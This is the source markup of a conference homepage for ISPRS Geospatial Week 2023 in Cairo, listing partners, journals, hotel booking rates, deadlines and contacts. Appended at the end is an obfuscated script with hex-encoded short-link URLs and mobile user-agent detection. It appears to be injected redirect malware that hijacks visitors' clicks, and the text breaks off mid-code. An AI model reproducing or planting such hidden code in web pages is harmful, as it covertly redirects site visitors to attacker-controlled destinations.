Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 